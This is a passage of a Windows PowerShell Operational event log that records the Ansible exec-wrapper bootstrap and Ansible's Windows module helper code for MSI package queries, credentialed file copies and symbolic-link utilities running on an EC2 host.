NativeMethods.MsiGetPatchInfoExW(patchCode, productCode, userSid, context, property, buffer, ref bufferLength); if (res != 0) throw new Win32Exception((int)res); return buffer.ToString(); } public static string GetProperty(SafeMsiHandle productHandle, string property) { StringBuilder buffer = new StringBuilder(0); UInt32 bufferLength = 0; NativeMethods.MsiGetPropertyW(productHandle, property, buffer, ref bufferLength); // Make sure we include the null byte char at the end. bufferLength += 1; buffer.EnsureCapacity((int)bufferLength); UInt32 res = NativeMethods.MsiGetPropertyW(productHandle, property, buffer, ref bufferLength); if (res != 0) throw new Win32Exception((int)res); return buffer.ToString(); } public static SafeMsiHandle GetSummaryHandle(string databasePath) { SafeMsiHandle summaryInfo = null; UInt32 res = NativeMethods.MsiGetSummaryInformationW(IntPtr.Zero, databasePath, 0, out summaryInfo); if (res != 0) throw new Win32Exception((int)res); return summaryInfo; } public static string GetSummaryPropertyString(SafeMsiHandle summaryHandle, UInt32 propertyId) { UInt32 dataType = 0; Int32 intPropValue = 0; System.Runtime.InteropServices.ComTypes.FILETIME propertyFiletime = new System.Runtime.InteropServices.ComTypes.FILETIME(); StringBuilder buffer = new StringBuilder(0); UInt32 bufferLength = 0; NativeMethods.MsiSummaryInfoGetPropertyW(summaryHandle, propertyId, out dataType, out intPropValue, ref propertyFiletime, buffer, ref bufferLength); // Make sure we include the null byte char at the end. bufferLength += 1; buffer.EnsureCapacity((int)bufferLength); UInt32 res = NativeMethods.MsiSummaryInfoGetPropertyW(summaryHandle, propertyId, out dataType, out intPropValue, ref propertyFiletime, buffer, ref bufferLength); if (res != 0) throw new Win32Exception((int)res); return buffer.ToString(); } public static bool IsMsi(string filename) { return GetClsid(filename) == MSI_CLSID; } public static bool IsMsp(string filename) { return GetClsid(filename) == MSP_CLSID; } public static SafeMsiHandle OpenPackage(string packagePath, bool ignoreMachineState) { SafeMsiHandle packageHandle = null; UInt32 options = 0; if (ignoreMachineState) options |= 1; // MSIOPENPACKAGEFLAGS_IGNOREMACHINESTATE UInt32 res = NativeMethods.MsiOpenPackageExW(packagePath, options, out packageHandle); if (res != 0) throw new Win32Exception((int)res); return packageHandle; } public static InstallState QueryProductState(string productCode) { return NativeMethods.MsiQueryProductStateW(productCode); } private static Guid GetClsid(string filename) { Guid clsid = Guid.Empty; NativeMethods.GetClassFile(filename, ref clsid); return clsid; } } } '@ } Function Add-SystemReadAce { [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingEmptyCatchBlock', '', Justification = 'Failing to get or set the ACE is not critical, SYSTEM could still have access without it.')] [CmdletBinding()] param ( [Parameter(Mandatory = $true)] [String] $Path ) # Don't set the System ACE if the path is a UNC path as the SID won't be valid. if (([Uri]$Path).IsUnc) { return } # If $Path is on a read only file system or one that doesn't support ACLs then this will fail. SYSTEM might still # have access to the path so don't treat it as critical. # https://github.com/ansible-collections/ansible.windows/issues/142 try { $acl = Get-Acl -LiteralPath $Path } catch { return } $ace = New-Object -TypeName System.Security.AccessControl.FileSystemAccessRule -ArgumentList @( (New-Object -TypeName System.Security.Principal.SecurityIdentifier -ArgumentList ('S-1-5-18')), [System.Security.AccessControl.FileSystemRights]::Read, [System.Security.AccessControl.AccessControlType]::Allow ) $acl.AddAccessRule($ace) try { $acl | Set-Acl -LiteralPath $path } catch {} } Function Copy-ItemWithCredential { [CmdletBinding(SupportsShouldProcess = $false)] param ( [String] $Path, [String] $Destination, [PSCredential] $Credential ) $filename = Split-Path -Path $Path -Leaf $targetPath = Join-Path -Path $Destination -ChildPath $filename # New-PSDrive with -Credentials seems to have lots of issues, just impersonate a NewCredentials token and copy the # file locally. NewCredentials will ensure the outbound auth to the UNC path is with the new credentials specified. $domain = [NullString]::Value $username = $Credential.UserName if ($username.Contains('\')) { $userSplit = $username.Split('\', 2) $domain = $userSplit[0] $username = $userSplit[1] } $impersonated = $false $token = [Ansible.AccessToken.TokenUtil]::LogonUser( $username, $domain, $Credential.GetNetworkCredential().Password, [Ansible.AccessToken.LogonType]::NewCredentials, [Ansible.AccessToken.LogonProvider]::WinNT50 ) try { [Ansible.AccessToken.TokenUtil]::ImpersonateToken($token) $impersonated = $true Copy-Item -LiteralPath $Path -Destination $targetPath } finally { if ($impersonated) { [Ansible.AccessToken.TokenUtil]::RevertToSelf() } $token.Dispose() } $targetPath } Function Get-UrlFile { [CmdletBinding()] param ( [Parameter(Mandatory = $true)] [Object] $Module, [Parameter(Mandatory = $true)] [String] $Url ) $request = (Get-AnsibleWindowsWebRequest -Url $Url -Module $module) Invoke-AnsibleWindowsWebRequest -Module $module -Request $request -Script { Param ([System.Net.WebResponse]$Response, [System.IO.Stream]$Stream) $tempPath = Join-Path -Path $module.Tmpdir -ChildPath $Response.ResponseUri.Segments[-1] $fs = [System.IO.File]::Create($tempPath) try { $Stream.CopyTo($fs) $fs.Flush() } finally { $fs.Dispose() } $tempPath } } Function Format-PackageStatus { [CmdletBinding()] param ( [Parameter(Mandatory = $true)] [AllowEmptyString()] [String] $Id, [Parameter(Mandatory = $true)] [String] $Provider, [Switch] $Installed, [Switch] $Skip, [Switch] $SkipFileForRemove, [Hashtable] $ExtraInfo = @{} ) @{ Id = $Id Installed = $Installed.IsPresent Provider = $Provider Skip = $Skip.IsPresent SkipFileForRemove = $SkipFileForRemove.IsPresent ExtraInfo = $ExtraInfo } } Function Get-InstalledStatus { [CmdletBinding()] param ( [String] $Path, [String] $Id, [String] $Provider, [String] $CreatesPath, [String] 7db80e0a-03ef-4a9d-a72f-450c7ff1d1d1 410314106200x0154670Microsoft-Windows-PowerShell/OperationalEC2AMAZ-TJL6EBN Severity = Informational Host Name = Default Host Host Version = 5.1.14393.6343 Host ID = 2ea28850-ee9e-4607-9653-6e16b050d4c9 Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== Engine Version = 5.1.14393.6343 Runspace ID = 630fbcfa-1b03-4ab9-ac41-7bc56014a145 Pipeline ID = 10 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 34 User = EC2AMAZ-TJL6EBN\Administrator Connected User = Shell ID = Microsoft.PowerShell CommandInvocation(Add-Type): "Add-Type" ParameterBinding(Add-Type): name="TypeDefinition"; value="using Microsoft.Win32.SafeHandles; using System; using System.Collections.Generic; using System.IO; using System.Runtime.InteropServices; using System.Text; namespace Ansible { public enum LinkType { SymbolicLink, JunctionPoint, HardLink } public class LinkUtilWin32Exception : System.ComponentModel.Win32Exception { private string _msg; public LinkUtilWin32Exception(string message) : this(Marshal.GetLastWin32Error(), message) { } public LinkUtilWin32Exception(int errorCode, string message) : base(errorCode) { _msg = String.Format("{0} ({1}, Win32ErrorCode {2})", message, base.Message, errorCode); } public override string Message { get { return _msg; } } public static explicit operator LinkUtilWin32Exception(string message) { return new LinkUtilWin32Exception(message); } } public class LinkInfo { public LinkType Type { get; internal set; } public string PrintName { get; internal set; } public string SubstituteName { get; internal set; } public string AbsolutePath { get; internal set; } public string TargetPath { get; internal set; } public string[] HardTargets { get; internal set; } } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct REPARSE_DATA_BUFFER { public UInt32 ReparseTag; public UInt16 ReparseDataLength; public UInt16 Reserved; public UInt16 SubstituteNameOffset; public UInt16 SubstituteNameLength; public UInt16 PrintNameOffset; public UInt16 PrintNameLength; [MarshalAs(UnmanagedType.ByValArray, SizeConst = LinkUtil.MAXIMUM_REPARSE_DATA_BUFFER_SIZE)] public char[] PathBuffer; } public class LinkUtil { public const int MAXIMUM_REPARSE_DATA_BUFFER_SIZE = 1024 * 16; private const UInt32 FILE_FLAG_BACKUP_SEMANTICS = 0x02000000; private const UInt32 FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000; private const UInt32 FSCTL_GET_REPARSE_POINT = 0x000900A8; private const UInt32 FSCTL_SET_REPARSE_POINT = 0x000900A4; private const UInt32 FILE_DEVICE_FILE_SYSTEM = 0x00090000; private const UInt32 IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003; private const UInt32 IO_REPARSE_TAG_SYMLINK = 0xA000000C; private const UInt32 SYMLINK_FLAG_RELATIVE = 0x00000001; private const Int64 INVALID_HANDLE_VALUE = -1; private const UInt32 SIZE_OF_WCHAR = 2; private const UInt32 SYMBOLIC_LINK_FLAG_FILE = 0x00000000; private const UInt32 SYMBOLIC_LINK_FLAG_DIRECTORY = 0x00000001; [DllImport("kernel32.dll", CharSet = CharSet.Auto)] private static extern SafeFileHandle CreateFile( string lpFileName, [MarshalAs(UnmanagedType.U4)] FileAccess dwDesiredAccess, [MarshalAs(UnmanagedType.U4)] FileShare dwShareMode, IntPtr lpSecurityAttributes, [MarshalAs(UnmanagedType.U4)] FileMode dwCreationDisposition, UInt32 dwFlagsAndAttributes, IntPtr hTemplateFile); // Used by GetReparsePointInfo() [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeviceIoControl( SafeFileHandle hDevice, UInt32 dwIoControlCode, IntPtr lpInBuffer, UInt32 nInBufferSize, out REPARSE_DATA_BUFFER lpOutBuffer, UInt32 nOutBufferSize, out UInt32 lpBytesReturned, IntPtr lpOverlapped); // Used by CreateJunctionPoint() [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeviceIoControl( SafeFileHandle hDevice, UInt32 dwIoControlCode, REPARSE_DATA_BUFFER lpInBuffer, UInt32 nInBufferSize, IntPtr lpOutBuffer, UInt32 nOutBufferSize, out UInt32 lpBytesReturned, IntPtr lpOverlapped); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool GetVolumePathName( string lpszFileName, StringBuilder lpszVolumePathName, ref UInt32 cchBufferLength); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern IntPtr FindFirstFileNameW( string lpFileName, UInt32 dwFlags, ref UInt32 StringLength, StringBuilder LinkName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool FindNextFileNameW( IntPtr hFindStream, ref UInt32 StringLength, StringBuilder LinkName); [DllImport("kernel32.dll", SetLastError = true)] private static extern bool FindClose( IntPtr hFindFile); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool RemoveDirectory( string lpPathName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeleteFile( string lpFileName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool CreateSymbolicLink( string lpSymlinkFileName, string lpTargetFileName, UInt32 dwFlags); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool CreateHardLink( string lpFileName, string lpExistingFileName, IntPtr lpSecurityAttributes); public static LinkInfo GetLinkInfo(string linkPath) { FileAttributes attr = File.GetAttributes(linkPath); if (attr.HasFlag(FileAttributes.ReparsePoint)) return GetReparsePointInfo(linkPath); if (!attr.HasFlag(FileAttributes.Directory)) return GetHardLinkInfo(linkPath); return null; } public static void DeleteLink(string linkPath) { bool success; FileAttributes attr = File.GetAttributes(linkPath); if (attr.HasFlag(FileAttributes.Directory)) { success = RemoveDirectory(linkPath); } else { success = DeleteFile(linkPath); } if (!success) throw new LinkUtilWin32Exception(String.Format("Failed to delete link at {0}", linkPath)); } public static void CreateLink(string linkPath, String linkTarget, LinkType linkType) { switch (linkType) { case LinkType.SymbolicLink: UInt32 linkFlags; FileAttributes attr = File.GetAttributes(linkTarget); if (attr.HasFlag(FileAttributes.Directory)) linkFlags = SYMBOLIC_LINK_FLAG_DIRECTORY; else linkFlags = SYMBOLIC_LINK_FLAG_FILE; if (!CreateSymbolicLink(linkPath, linkTarget, linkFlags)) throw new LinkUtilWin32Exception(String.Format("CreateSymbolicLink({0}, {1}, {2}) failed", linkPath, linkTarget, linkFlags)); break; case LinkType.JunctionPoint: CreateJunctionPoint(linkPath, linkTarget); break; case LinkType.HardLink: if (!CreateHardLink(linkPath, linkTarget, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("CreateHardLink({0}, {1}) failed", linkPath, linkTarget)); break; } } private static LinkInfo GetHardLinkInfo(string linkPath) { UInt32 maxPath = 260; List<string> result = new List<string>(); StringBuilder sb = new StringBuilder((int)maxPath); UInt32 stringLength = maxPath; if (!GetVolumePathName(linkPath, sb, ref stringLength)) throw new LinkUtilWin32Exception("GetVolumePathName() failed"); string volume = sb.ToString(); stringLength = maxPath; IntPtr findHandle = FindFirstFileNameW(linkPath, 0, ref stringLength, sb); if (findHandle.ToInt64() != INVALID_HANDLE_VALUE) { try { do { string hardLinkPath = sb.ToString(); if (hardLinkPath.StartsWith("\\")) hardLinkPath = hardLinkPath.Substring(1, hardLinkPath.Length - 1); result.Add(Path.Combine(volume, hardLinkPath)); stringLength = maxPath; } while (FindNextFileNameW(findHandle, ref stringLength, sb)); } finally { FindClose(findHandle); } } if (result.Count > 1) return new LinkInfo { Type = LinkType.HardLink, HardTargets = result.ToArray() }; return null; } private static LinkInfo GetReparsePointInfo(string linkPath) { SafeFileHandle fileHandle = CreateFile( linkPath, FileAccess.Read, FileShare.None, IntPtr.Zero, FileMode.Open, FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS, IntPtr.Zero); if (fileHandle.IsInvalid) throw new LinkUtilWin32Exception(String.Format("CreateFile({0}) failed", linkPath)); REPARSE_DATA_BUFFER buffer = new REPARSE_DATA_BUFFER(); UInt32 bytesReturned; try { if (!DeviceIoControl( fileHandle, FSCTL_GET_REPARSE_POINT, IntPtr.Zero, 0, out buffer, MAXIMUM_REPARSE_DATA_BUFFER_SIZE, out bytesReturned, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("DeviceIoControl() failed for file at {0}", linkPath)); } finally { fileHandle.Dispose(); } bool isRelative = false; int pathOffset = 0; LinkType linkType; if (buffer.ReparseTag == IO_REPARSE_TAG_SYMLINK) { UInt32 bufferFlags = Convert.ToUInt32(buffer.PathBuffer[0]) + Convert.ToUInt32(buffer.PathBuffer[1]); if (bufferFlags == SYMLINK_FLAG_RELATIVE) isRelative = true; pathOffset = 2; linkType = LinkType.SymbolicLink; } else if (buffer.ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) { linkType = LinkType.JunctionPoint; } else { string errorMessage = String.Format("Invalid Reparse Tag: {0}", buffer.ReparseTag.ToString()); throw new Exception(errorMessage); } string printName = new string(buffer.PathBuffer, (int)(buffer.PrintNameOffset / SIZE_OF_WCHAR) + pathOffset, (int)(buffer.PrintNameLength / SIZE_OF_WCHAR)); string substituteName = new string(buffer.PathBuffer, (int)(buffer.SubstituteNameOffset / SIZE_OF_WCHAR) + pathOffset, (int)(buffer.SubstituteNameLength / SIZE_OF_WCHAR)); // TODO: should we check for \?\UNC\server for convert it to the NT style \\server path // Remove the leading Windows object directory \?\ from the path if present string targetPath = substituteName; if (targetPath.StartsWith("\\??\\")) targetPath = targetPath.Substring(4, targetPath.Length - 4); string absolutePath = targetPath; if (isRelative) absolutePath = Path.GetFullPath(Path.Combine(new FileInfo(linkPath).Directory.FullName, targetPath)); return new LinkInfo { Type = linkType, PrintName = printName, SubstituteName = substituteName, AbsolutePath = absolutePath, TargetPath = targetPath }; } private static void CreateJunctionPoint(string linkPath, string linkTarget) { // We need to create the link as a dir beforehand Directory.CreateDirectory(linkPath); SafeFileHandle fileHandle = CreateFile( linkPath, FileAccess.Write, FileShare.Read | FileShare.Write | FileShare.None, IntPtr.Zero, FileMode.Open, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, IntPtr.Zero); if (fileHandle.IsInvalid) throw new LinkUtilWin32Exception(String.Format("CreateFile({0}) failed", linkPath)); try { string substituteName = "\\??\\" + Path.GetFullPath(linkTarget); string printName = linkTarget; REPARSE_DATA_BUFFER buffer = new REPARSE_DATA_BUFFER(); buffer.SubstituteNameOffset = 0; buffer.SubstituteNameLength = (UInt16)(substituteName.Length * SIZE_OF_WCHAR); buffer.PrintNameOffset = (UInt16)(buffer.SubstituteNameLength + 2); buffer.PrintNameLength = (UInt16)(printName.Length * SIZE_OF_WCHAR); buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT; buffer.ReparseDataLength = (UInt16)(buffer.SubstituteNameLength + buffer.PrintNameLength + 12); buffer.PathBuffer = new char[MAXIMUM_REPARSE_DATA_BUFFER_SIZE]; byte[] unicodeBytes = Encoding.Unicode.GetBytes(substituteName + "\0" + printName); char[] pathBuffer = Encoding.Unicode.GetChars(unicodeBytes); Array.Copy(pathBuffer, buffer.PathBuffer, pathBuffer.Length); UInt32 bytesReturned; if (!DeviceIoControl( fileHandle, FSCTL_SET_REPARSE_POINT, buffer, (UInt32)(buffer.ReparseDataLength + 8), IntPtr.Zero, 0, out bytesReturned, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("DeviceIoControl() failed to create junction point at {0} to {1}", linkPath, linkTarget)); } finally { fileHandle.Dispose(); } } } }" 4104152150x0154668Microsoft-Windows-PowerShell/OperationalEC2AMAZ-TJL6EBN11Function Load-LinkUtils() { $link_util = @' using Microsoft.Win32.SafeHandles; using System; using System.Collections.Generic; using System.IO; using System.Runtime.InteropServices; using System.Text; namespace Ansible { public enum LinkType { SymbolicLink, JunctionPoint, HardLink } public class LinkUtilWin32Exception : System.ComponentModel.Win32Exception { private string _msg; public LinkUtilWin32Exception(string message) : this(Marshal.GetLastWin32Error(), message) { } public LinkUtilWin32Exception(int errorCode, string message) : base(errorCode) { _msg = String.Format("{0} ({1}, Win32ErrorCode {2})", message, base.Message, errorCode); } public override string Message { get { return _msg; } } public static explicit operator LinkUtilWin32Exception(string message) { return new LinkUtilWin32Exception(message); } } public class LinkInfo { public LinkType Type { get; internal set; } public string PrintName { get; internal set; } public string SubstituteName { get; internal set; } public string AbsolutePath { get; internal set; } public string TargetPath { get; internal set; } public string[] HardTargets { get; internal set; } } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct REPARSE_DATA_BUFFER { public UInt32 ReparseTag; public UInt16 ReparseDataLength; public UInt16 Reserved; public UInt16 SubstituteNameOffset; public UInt16 SubstituteNameLength; public UInt16 PrintNameOffset; public UInt16 PrintNameLength; [MarshalAs(UnmanagedType.ByValArray, SizeConst = LinkUtil.MAXIMUM_REPARSE_DATA_BUFFER_SIZE)] public char[] PathBuffer; } public class LinkUtil { public const int MAXIMUM_REPARSE_DATA_BUFFER_SIZE = 1024 * 16; private const UInt32 FILE_FLAG_BACKUP_SEMANTICS = 0x02000000; private const UInt32 FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000; private const UInt32 FSCTL_GET_REPARSE_POINT = 0x000900A8; private const UInt32 FSCTL_SET_REPARSE_POINT = 0x000900A4; private const UInt32 FILE_DEVICE_FILE_SYSTEM = 0x00090000; private const UInt32 IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003; private const UInt32 IO_REPARSE_TAG_SYMLINK = 0xA000000C; private const UInt32 SYMLINK_FLAG_RELATIVE = 0x00000001; private const Int64 INVALID_HANDLE_VALUE = -1; private const UInt32 SIZE_OF_WCHAR = 2; private const UInt32 SYMBOLIC_LINK_FLAG_FILE = 0x00000000; private const UInt32 SYMBOLIC_LINK_FLAG_DIRECTORY = 0x00000001; [DllImport("kernel32.dll", CharSet = CharSet.Auto)] private static extern SafeFileHandle CreateFile( string lpFileName, [MarshalAs(UnmanagedType.U4)] FileAccess dwDesiredAccess, [MarshalAs(UnmanagedType.U4)] FileShare dwShareMode, IntPtr lpSecurityAttributes, [MarshalAs(UnmanagedType.U4)] FileMode dwCreationDisposition, UInt32 dwFlagsAndAttributes, IntPtr hTemplateFile); // Used by GetReparsePointInfo() [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeviceIoControl( SafeFileHandle hDevice, UInt32 dwIoControlCode, IntPtr lpInBuffer, UInt32 nInBufferSize, out REPARSE_DATA_BUFFER lpOutBuffer, UInt32 nOutBufferSize, out UInt32 lpBytesReturned, IntPtr lpOverlapped); // Used by CreateJunctionPoint() [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeviceIoControl( SafeFileHandle hDevice, UInt32 dwIoControlCode, REPARSE_DATA_BUFFER lpInBuffer, UInt32 nInBufferSize, IntPtr lpOutBuffer, UInt32 nOutBufferSize, out UInt32 lpBytesReturned, IntPtr lpOverlapped); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool GetVolumePathName( string lpszFileName, StringBuilder lpszVolumePathName, ref UInt32 cchBufferLength); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern IntPtr FindFirstFileNameW( string lpFileName, UInt32 dwFlags, ref UInt32 StringLength, StringBuilder LinkName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool FindNextFileNameW( IntPtr hFindStream, ref UInt32 StringLength, StringBuilder LinkName); [DllImport("kernel32.dll", SetLastError = true)] private static extern bool FindClose( IntPtr hFindFile); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool RemoveDirectory( string lpPathName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeleteFile( string lpFileName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool CreateSymbolicLink( string lpSymlinkFileName, string lpTargetFileName, UInt32 dwFlags); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool CreateHardLink( string lpFileName, string lpExistingFileName, IntPtr lpSecurityAttributes); public static LinkInfo GetLinkInfo(string linkPath) { FileAttributes attr = File.GetAttributes(linkPath); if (attr.HasFlag(FileAttributes.ReparsePoint)) return GetReparsePointInfo(linkPath); if (!attr.HasFlag(FileAttributes.Directory)) return GetHardLinkInfo(linkPath); return null; } public static void DeleteLink(string linkPath) { bool success; FileAttributes attr = File.GetAttributes(linkPath); if (attr.HasFlag(FileAttributes.Directory)) { success = RemoveDirectory(linkPath); } else { success = DeleteFile(linkPath); } if (!success) throw new LinkUtilWin32Exception(String.Format("Failed to delete link at {0}", linkPath)); } public static void CreateLink(string linkPath, String linkTarget, LinkType linkType) { switch (linkType) { case LinkType.SymbolicLink: UInt32 linkFlags; FileAttributes attr = File.GetAttributes(linkTarget); if (attr.HasFlag(FileAttributes.Directory)) linkFlags = SYMBOLIC_LINK_FLAG_DIRECTORY; else linkFlags = SYMBOLIC_LINK_FLAG_FILE; if (!CreateSymbolicLink(linkPath, linkTarget, linkFlags)) throw new LinkUtilWin32Exception(String.Format("CreateSymbolicLink({0}, {1}, {2}) failed", linkPath, linkTarget, linkFlags)); break; case LinkType.JunctionPoint: CreateJunctionPoint(linkPath, linkTarget); break; case LinkType.HardLink: if (!CreateHardLink(linkPath, linkTarget, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("CreateHardLink({0}, {1}) failed", linkPath, linkTarget)); break; } } private static LinkInfo GetHardLinkInfo(string linkPath) { UInt32 maxPath = 260; List<string> result = new List<string>(); StringBuilder sb = new StringBuilder((int)maxPath); UInt32 stringLength = maxPath; if (!GetVolumePathName(linkPath, sb, ref stringLength)) throw new LinkUtilWin32Exception("GetVolumePathName() failed"); string volume = sb.ToString(); stringLength = maxPath; IntPtr findHandle = FindFirstFileNameW(linkPath, 0, ref stringLength, sb); if (findHandle.ToInt64() != INVALID_HANDLE_VALUE) { try { do { string hardLinkPath = sb.ToString(); if (hardLinkPath.StartsWith("\\")) hardLinkPath = hardLinkPath.Substring(1, hardLinkPath.Length - 1); result.Add(Path.Combine(volume, hardLinkPath)); stringLength = maxPath; } while (FindNextFileNameW(findHandle, ref stringLength, sb)); } finally { FindClose(findHandle); } } if (result.Count > 1) return new LinkInfo { Type = LinkType.HardLink, HardTargets = result.ToArray() }; return null; } private static LinkInfo GetReparsePointInfo(string linkPath) { SafeFileHandle fileHandle = CreateFile( linkPath, FileAccess.Read, FileShare.None, IntPtr.Zero, FileMode.Open, FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS, IntPtr.Zero); if (fileHandle.IsInvalid) throw new LinkUtilWin32Exception(String.Format("CreateFile({0}) failed", linkPath)); REPARSE_DATA_BUFFER buffer = new REPARSE_DATA_BUFFER(); UInt32 bytesReturned; try { if (!DeviceIoControl( fileHandle, FSCTL_GET_REPARSE_POINT, IntPtr.Zero, 0, out buffer, MAXIMUM_REPARSE_DATA_BUFFER_SIZE, out bytesReturned, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("DeviceIoControl() failed for file at {0}", linkPath)); } finally { fileHandle.Dispose(); } bool isRelative = false; int pathOffset = 0; LinkType linkType; if (buffer.ReparseTag == IO_REPARSE_TAG_SYMLINK) { UInt32 bufferFlags = Convert.ToUInt32(buffer.PathBuffer[0]) + Convert.ToUInt32(buffer.PathBuffer[1]); if (bufferFlags == SYMLINK_FLAG_RELATIVE) isRelative = true; pathOffset = 2; linkType = LinkType.SymbolicLink; } else if (buffer.ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) { linkType = LinkType.JunctionPoint; } else { string errorMessage = String.Format("Invalid Reparse Tag: {0}", buffer.ReparseTag.ToString()); throw new Exception(errorMessage); } string printName = new string(buffer.PathBuffer, (int)(buffer.PrintNameOffset / SIZE_OF_WCHAR) + pathOffset, (int)(buffer.PrintNameLength / SIZE_OF_WCHAR)); string substituteName = new string(buffer.PathBuffer, (int)(buffer.SubstituteNameOffset / SIZE_OF_WCHAR) + pathOffset, (int)(buffer.SubstituteNameLength / SIZE_OF_WCHAR)); // TODO: should we check for \?\UNC\server for convert it to the NT style \\server path // Remove the leading Windows object directory \?\ from the path if present string targetPath = substituteName; if (targetPath.StartsWith("\\??\\")) targetPath = targetPath.Substring(4, targetPath.Length - 4); string absolutePath = targetPath; if (isRelative) absolutePath = Path.GetFullPath(Path.Combine(new FileInfo(linkPath).Directory.FullName, targetPath)); return new LinkInfo { Type = linkType, PrintName = printName, SubstituteName = substituteName, AbsolutePath = absolutePath, TargetPath = targetPath }; } private static void CreateJunctionPoint(string linkPath, string linkTarget) { // We need to create the link as a dir beforehand Directory.CreateDirectory(linkPath); SafeFileHandle fileHandle = CreateFile( linkPath, FileAccess.Write, FileShare.Read | FileShare.Write | FileShare.None, IntPtr.Zero, FileMode.Open, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, IntPtr.Zero); if (fileHandle.IsInvalid) throw new LinkUtilWin32Exception(String.Format("CreateFile({0}) failed", linkPath)); try { string substituteName = "\\??\\" + Path.GetFullPath(linkTarget); string printName = linkTarget; REPARSE_DATA_BUFFER buffer = new REPARSE_DATA_BUFFER(); buffer.SubstituteNameOffset = 0; buffer.SubstituteNameLength = (UInt16)(substituteName.Length * SIZE_OF_WCHAR); buffer.PrintNameOffset = (UInt16)(buffer.SubstituteNameLength + 2); buffer.PrintNameLength = (UInt16)(printName.Length * SIZE_OF_WCHAR); buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT; buffer.ReparseDataLength = (UInt16)(buffer.SubstituteNameLength + buffer.PrintNameLength + 12); buffer.PathBuffer = new char[MAXIMUM_REPARSE_DATA_BUFFER_SIZE]; byte[] unicodeBytes = 